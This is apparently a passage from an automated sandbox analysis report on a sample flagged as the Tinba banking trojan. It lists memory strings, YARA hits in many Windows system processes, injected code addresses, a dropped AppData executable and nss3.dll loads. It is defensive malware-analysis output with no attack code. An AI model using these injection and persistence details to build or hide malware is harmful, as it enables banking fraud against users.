            Source: SearchApp.exe, 0000000B.00000000.1854349272.0000024B5843A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mths.be/fromcodepoint
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1726392280.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2908493718.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: SearchApp.exe, 0000000B.00000000.1758577403.0000024B420F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/owa
            Source: SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
            Source: SearchApp.exe, 0000000B.00000000.1774346407.0000024B447CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
            Source: SearchApp.exe, 0000000B.00000000.1804409730.0000024B54E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/mail/deeplink/attachment/
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comxee
            Source: SearchApp.exe, 0000000B.00000000.1803975206.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: SearchApp.exe, 0000000B.00000000.1814959925.0000024B5542F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
            Source: SearchApp.exe, 0000000B.00000000.1769556330.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/events?scenario=
            Source: SearchApp.exe, 0000000B.00000000.1811664629.0000024B5530E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/queryetItemChttps://substrate.office365.us/search/api/v2/
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbm
            Source: SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: SearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ng.com
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
            Source: SearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.comm
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49729 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected Tinba Banker
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 7284, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winver.exe PID: 7344, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR

            E-Banking Fraud

            barindex
            Yara detected Tinba Banker
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 7284, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winver.exe PID: 7344, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: C:\Windows\explorer.exeCode function: 3_2_013A2270 NtQueryDirectoryFile,3_2_013A2270
            Source: C:\Windows\explorer.exeCode function: 3_2_013A1EE1 NtCreateUserProcess,3_2_013A1EE1
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC21D1 NtEnumerateValueKey,4_2_00AC21D1
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_022600050_2_02260005
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_022618450_2_02261845
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02260EA90_2_02260EA9
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_02F00E852_2_02F00E85
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_02F018212_2_02F01821
            Source: C:\Windows\explorer.exeCode function: 3_2_013818213_2_01381821
            Source: C:\Windows\explorer.exeCode function: 3_2_01380E853_2_01380E85
            Source: C:\Windows\explorer.exeCode function: 3_2_013A18213_2_013A1821
            Source: C:\Windows\explorer.exeCode function: 3_2_013A0E853_2_013A0E85
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0E854_2_00AC0E85
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC18214_2_00AC1821
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910E855_2_00910E85
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_009118215_2_00911821
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0E856_2_009A0E85
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A18216_2_009A1821
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50E857_2_00A50E85
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A518217_2_00A51821
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40E858_2_00D40E85
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D418218_2_00D41821
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50E859_2_00B50E85
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B518219_2_00B51821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_0011182110_2_00111821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110E8510_2_00110E85
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_001C182112_2_001C1821
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_001C0E8512_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_0238000512_2_02380005
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02380EA912_2_02380EA9
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0E8515_2_00AB0E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB182115_2_00AB1821
            Source: C:\Windows\System32\smartscreen.exeCode function: 16_2_0029182116_2_00291821
            Source: C:\Windows\System32\smartscreen.exeCode function: 16_2_00290E8516_2_00290E85
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 17_2_001C182117_2_001C1821
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 17_2_001C0E8517_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 17_2_023A000517_2_023A0005
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 17_2_023A0EA917_2_023A0EA9
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 19_2_0058182119_2_00581821
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 19_2_00580E8519_2_00580E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 20_2_003D182120_2_003D1821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 20_2_003D0E8520_2_003D0E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 23_2_00900E8523_2_00900E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 23_2_0090182123_2_00901821
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 24_2_0018182124_2_00181821
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 24_2_00180E8524_2_00180E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 26_2_0019182126_2_00191821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 26_2_00190E8526_2_00190E85
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: 28_2_0001182128_2_00011821
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: 28_2_00010E8528_2_00010E85
            Source: C:\Windows\System32\svchost.exeCode function: 29_2_0022182129_2_00221821
            Source: C:\Windows\System32\svchost.exeCode function: 29_2_00220E8529_2_00220E85
            Source: C:\Windows\System32\dllhost.exeCode function: 30_2_006E182130_2_006E1821
            Source: C:\Windows\System32\dllhost.exeCode function: 30_2_006E0E8530_2_006E0E85
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_00E60E8531_2_00E60E85
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_00E6182131_2_00E61821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 32_2_00940E8532_2_00940E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 32_2_0094182132_2_00941821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 34_2_00B00E8534_2_00B00E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 34_2_00B0182134_2_00B01821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 35_2_02860E8535_2_02860E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 35_2_0286182135_2_02861821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 36_2_02BB0E8536_2_02BB0E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 36_2_02BB182136_2_02BB1821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 37_2_0256182137_2_02561821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 37_2_02560E8537_2_02560E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 38_2_0261182138_2_02611821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 38_2_02610E8538_2_02610E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 39_2_0252182139_2_02521821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 39_2_02520E8539_2_02520E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 40_2_02B20E8540_2_02B20E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 40_2_02B2182140_2_02B21821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 41_2_0145182141_2_01451821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 41_2_01450E8541_2_01450E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 42_2_0262182142_2_02621821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 42_2_02620E8542_2_02620E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 43_2_00EE0E8543_2_00EE0E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 43_2_00EE182143_2_00EE1821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 44_2_02D30E8544_2_02D30E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 44_2_02D3182144_2_02D31821
            Source: C:\Windows\System32\conhost.exeCode function: String function: 00E63653 appears 35 times
            Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 02F03653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 00223653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 00913653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 009A3653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 00D43653 appears 35 times
            Source: C:\Windows\System32\ctfmon.exeCode function: String function: 00A53653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 02563653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 02B23653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 02BB3653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 02523653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 02863653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 02623653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 01453653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 02D33653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 02613653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: String function: 00EE3653 appears 35 times
            Source: C:\Windows\explorer.exeCode function: String function: 013A3653 appears 34 times
            Source: C:\Windows\explorer.exeCode function: String function: 01383653 appears 35 times
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: String function: 00183653 appears 35 times
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: String function: 00013653 appears 35 times
            Source: C:\Windows\System32\smartscreen.exeCode function: String function: 00293653 appears 35 times
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: String function: 00B53653 appears 35 times
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: String function: 02383677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: String function: 023A3677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: String function: 001C3653 appears 70 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00943653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00193653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 003D3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00113653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00903653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00B03653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00AB3653 appears 35 times
            Source: C:\Windows\System32\sihost.exeCode function: String function: 00AC3653 appears 35 times
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: String function: 00583653 appears 35 times
            Source: C:\Windows\System32\dllhost.exeCode function: String function: 006E3653 appears 35 times
            Source: C:\Users\user\Desktop\java.exeCode function: String function: 02263677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dllJump to behavior
